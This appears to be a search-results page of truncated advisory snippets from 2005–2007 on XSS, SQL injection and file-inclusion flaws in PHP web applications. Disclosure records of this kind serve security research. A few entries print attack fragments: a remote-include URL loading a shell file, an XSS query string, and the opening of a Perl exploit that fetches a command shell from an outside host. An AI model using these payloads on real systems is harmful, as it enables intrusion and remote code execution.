95 matches found
Wikepage XSS vuln
Sunday, 7 October 2007 Wikepage XSS vuln. Vuln. discovered by : r0t Date: 7 October 2007 Vendor:http://www.wikepage.org/ affected versions:Wikepage Opus 13 2007.2 other versions also can be affected. Wikepage contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the...
phpMyAdmin multiple XSS vuln.
phpMyAdmin multiple XSS vuln. Vuln. discovered by : r0t Date: 10 August 2007 vendor:http://www.phpmyadmin.net/ orginal advisory: http://pridels-team.blogspot.com/2007/08/phpmyadmin-multiple-xss-vuln.html affected versions:2.10.3 latest stable version prior versions also can be affected. phpMyAdmi...
VisionProject Multiple XSS vuln.
VisionProject Multiple XSS vuln. Vuln. discovered by : r0t Date: 7 August 2007 vendor:www.visionproject.se orginal advsiory: http://pridels-team.blogspot.com/2007/08/visionproject-multiple-xss-vuln.html affected versions:VisionProject 3.1 and previous VisionProject contains a flaw that allows a...
DirectAdmin XSS vuln.
DirectAdmin XSS vuln. Vuln. discovered by : r0t Date: 28 June 2007 vendor:http://www.directadmin.com orginal advisory: http://pridels-team.blogspot.com/2007/06/directadmin-xss-vuln.html affected versions:v1.30.1 and previous DirectAdmin contains a flaw that allows a remote Cross-Site Scripting...
phpRaider sql vuln.
phpRaider sql vuln. Vuln. discovered by : r0t Date: 22 June 2007 vendor:http://phpraider.com/ orginal advisory: http://pridels-team.blogspot.com/2007/06/phpraider-sql-vuln.html affected versions: phpRaider v1.0.0.rc8 other versions also can be affected. phpRaider contains a flaw that allows a...
PHPAccounts vuln.
PHPAccounts vuln. Vuln. discovered by : r0t Date: 21 June 2007 vendor:http://phpaccounts.com/ orginal advisory: http://pridels-team.blogspot.com/2007/06/phpaccounts-vuln.html affected versions: PHPAccounts 0.5 other versions also can be affected. 1.Local file inclussion PHPAccounts contains a fla...
FileRun Vuln.
FileRun Vuln. Vuln. discovered by : r0t Date: 2 May 2007 vendor:http://filerun.dreamhosters.com/ orginal advisory:http://pridels.blogspot.com/2007/05/filerun-vuln.html affected versions: 1.0 and previous 1. FileRun contains a flaw that allows a remote sql injection attacks.Input passed to the "fi...
drjr7.txt
TitLe : Remote Include Vulnerability ==== in Dr.Jr7 Gallery 3.2 RC1 eXpLoIt : http://target/path/Galleryone/Gallery.php?pic=shell.txt By : R0t-KeY --- s33 u ;...
Xss in MttKe-php v2.6
TitLe : Xss in MttKe-php v2.6 eXpLoIt : http://target/path/components/polls?p=poll&topic=scriptalert/script By : R0t-KeY --- s33 u ;...
[SA20993] HiveMail Cross-Site Scripting and SQL Injection Vulnerabilities
---------------------------------------------------------------------- Hardcore Disassembler / Reverse Engineer Wanted! Want to work with IDA and BinDiff? Want to write PoC's and Exploits? Your nationality is not important. We will get you a work permit, find an apartment, and offer a relocation...
DGNews v 1.5 File Upload Vuln.
DGNews v 1.5 File Upload Vuln. Vuln. discovered by : r0t Date: 29 may 2006 vendor:www.diangemilang.com/dgscripts.php affected versions:v 1.5 and prior orginal advisory: http://pridels.blogspot.com/2006/05/dgnews-v-15-file-upload-vuln.html Vuln. Description: It is possible to upload arbitrary file...
[SA19952] Albinator File Inclusion and Cross-Site Scripting Vulnerabilities
TITLE: Albinator File Inclusion and Cross-Site Scripting Vulnerabilities SECUNIA ADVISORY ID: SA19952 VERIFY ADVISORY: http://secunia.com/advisories/19952/ CRITICAL: Highly critical IMPACT: Cross Site Scripting, System access WHERE: From remote REVISION: 1.1 originally posted 2006-05-04 SOFTWARE:...
Albinator <= 2.0.6 (Config_rootdir) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications ================================================================= Albinator perl wb.pl http://vulnerable.com/ http://target.com/cmd.gif cmd cmd shell example: cmd shell variable: $GETcmd; use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd =...
albinator <= 2.0.8 Remote File Inclusion Vuln and XSS
albinator = 2.0.8 Remote File Inclusion Vuln and XSS Vuln. discovered by :VietMafia & r0t Pridels Sec Crew Date: 3 may 2006 vendor:http://www.albinator.com/ affected versions:2.8 and prior orginal advisory:http://pridels.blogspot.com/2006/05/albinator-208-remote-file-inclusion.html Vuln...
X-Cart SQL inj. vuln.
X-Cart SQL inj. vuln. Vuln. discovered by : r0t Date: 20 april 2006 vendorlink:http://www.x-cart.com/ affected versions: X-Cart Gold v4.0.18 X-Cart Pro v4.0.18 X-Cart 4.1.0 beta 1 and prior versions also can be affected . orginal advisory:...
IPB <= 2.1.5 SQL inj. vuln.
IPB = 2.1.5 SQL inj. vuln. Vuln. discovered by : r0t Date: 19 april 2006 vendorlink:http://www.invisionboard.com/ affected versions:2.1.5 and previous orginal advisory: http://pridels.blogspot.com/2006/04/ipb-215-sql-inj-vuln.html Vuln. Description: IPB contains a flaw that allows a remote sql...
xFlow v5.x multiple vuln.
xFlow v5.x multiple vuln. Vuln. discovered by : r0t Date: 18 april 2006 vendorlink:http://www.skymarx.com/affiliatesoftware.html affected versions:v5.46.11 and previous orginal advisory: http://pridels.blogspot.com/2006/04/xflow-v5x-multiple-vuln.html Product info: After over five years of...
classifiedZONE v1.2 XSS vuln.
classifiedZONE v1.2 XSS vuln. Vuln. discovered by : r0t Date: 28 march 2006 vendor:http://www.fusionzone.com/applications/classifieds/ affected versions:v.1.2 and prior Vuln. Description: classifiedZONE contains a flaw that allows a remote cross site scripting attack. This flaw exists because inp...
Primo Cart SQL inj.
Primo Cart SQL inj. Vuln. discovered by : r0t Date: 2 jan. 2006 orginal advisory:http://pridels.blogspot.com/2006/01/primo-cart-sql-inj.html vendor:www.primoplace.com/primo-cart.htm affected version:1.0 and prior Product Description: Primo Cart is a fully customizable turnkey shopping cart soluti...
OoApp Guestbook XSS vuln.
OoApp Guestbook XSS vuln. Vuln. discovered by : r0t Date: 30 dec. 2005 orginal advisory:http://pridels.blogspot.com/2005/12/ooapp-guestbook-xss-vuln.html vendor:http://www.ooapp.com/ affected version:2.1 and prior Product Description: This is a free php based guestbook for your web site. Easy to...